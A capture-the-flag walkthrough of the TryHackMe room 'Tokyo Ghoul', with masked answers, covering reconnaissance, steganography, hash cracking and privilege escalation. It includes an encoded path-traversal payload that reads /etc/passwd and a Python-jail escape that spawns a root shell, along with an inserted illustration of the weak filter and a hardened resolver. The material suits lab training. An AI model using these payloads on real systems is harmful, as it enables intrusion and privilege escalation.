TryHackMe: Tokyo Ghoul
Today we will take a look at TryHackMe: Tokyo Ghoul. My goal in sharing this writeup is to show you the way if you get stuck. Please try to understand each step and take notes. Then you can start watching the anime. ;)

Recon
Task 1: About the room
# Read the above
> No answer needed
# Deploy the machine
> No answer needed
Task 2: Where am i ?
# Use nmap to scan all ports
Command: sudo nmap -sS -sC -sV -oN nmap/initial $IP

# How many ports are open ?
> *
# What is the OS used ?
> U*****
Task 3: Planning to escape
# Did you find the note that the other ghouls gave you? Where did you find it?

> j********.****
# What is the key for Rize executable?
## Let’s check the FTP port and get the files we need from inside
Command: ftp $IP

##Let’s look at the files.

## Here we see an ELF (Executable and Linkable Format) file
## Let’s make it executable and run it
Command: sudo chmod +x need_to_talk
Command: ./need_to_talk

## Extract the printable strings from the binary with the strings command
Command: strings need_to_talk

> k********
# Use a tool to get the other note from Rize .
## Let’s run the binary again, because now we have the password.

## Now let’s extract the note from the picture with the given passphrase
Command: steghide extract -sf rize_and_kaneki.jpg

Task 4: What Rize is trying to say?
# What the message mean did you understand it ? what it says?
## When we open the text, we are greeted by Morse code.

## Let’s try to read it

## After decoding the Morse we are confronted with a mix of encodings we do not recognize, so we turn to CyberChef

> d***************

# Can you see the weakness in the dark ? no ? just search
## Let’s check the site directory
Command: gobuster dir -u http://10.10.255.75/d******/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

## The new page gives us a choice; I checked both and they lead to the same place.

# What did you find something ? crack it
## I wanted to look for LFI, but it answered me like this

## So we need to bypass the filter. Let’s do some research.
https://raw.githubusercontent.com/emadshanab/LFI-Payload-List/master/LFI%20payloads.txt
## /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

## I’m not silly dude ;)
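As an added illustration (not code from the room or from this writeup), here is a hypothetical reconstruction of why a filter that only strips a literal `../` is defeated by the URL-encoded payload above, placed next to a resolver that decodes and canonicalizes before checking that the result stays under the web root. `BASE_DIR` and both function names are assumptions.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

BASE_DIR = "/var/www/html"  # assumed web root, not taken from the room

# Weak filter (hypothetical reconstruction, NOT the room's real code):
# it removes the literal "../" from the raw parameter before decoding,
# so "%2e%2e/" passes the check untouched and only becomes "../"
# when the value is decoded right before the file is opened.
def weak_resolve(raw_param: str) -> str:
    filtered = raw_param.replace("../", "")
    decoded = unquote(filtered)          # decoding happens after the check
    return posixpath.normpath(BASE_DIR + "/" + decoded)

# Hardened version: decode first (bounded loop to handle double encoding),
# reject NUL bytes, normalize, then verify the final path is under BASE_DIR.
# Returns None when the request must be refused.
def safe_resolve(raw_param: str) -> Optional[str]:
    decoded = raw_param
    for _ in range(3):                   # %252e -> %2e -> "." at most a few rounds
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded:                # NUL-byte truncation tricks
        return None
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, decoded.lstrip("/")))
    if candidate != BASE_DIR and not candidate.startswith(BASE_DIR + "/"):
        return None                      # escaped the web root
    return candidate

if __name__ == "__main__":
    # Constructed sample: the encoded traversal from the writeup above.
    encoded = "%2e%2e/" * 10 + "etc/passwd"
    print("weak :", weak_resolve(encoded))   # escapes to /etc/passwd
    print("safe :", safe_resolve(encoded))   # None
```

The check on the canonical path, not on the raw string, is what matters: any encoding trick still has to produce a path under `BASE_DIR` to be served.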
# What is rize username ?
> k********
# What is rize password ?
## Let’s use John with the rockyou wordlist.
Command: sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt

> p**********
Task 5: Fight Jason
# User.txt
## Let’s connect with SSH.
Command: ssh username@$IP

# root.txt
## List the allowed sudo commands
Command: sudo -l
## We see a Python jail here. After some research, I found a bypass
Command: __builtins__.__dict__['__IMPORT__'.lower()]('PTY'.lower()).__dict__['SPAWN'.lower()]('/bin/bash')

## And now we are root

“If you have any questions or comments, please do not hesitate to write. Have a good day.”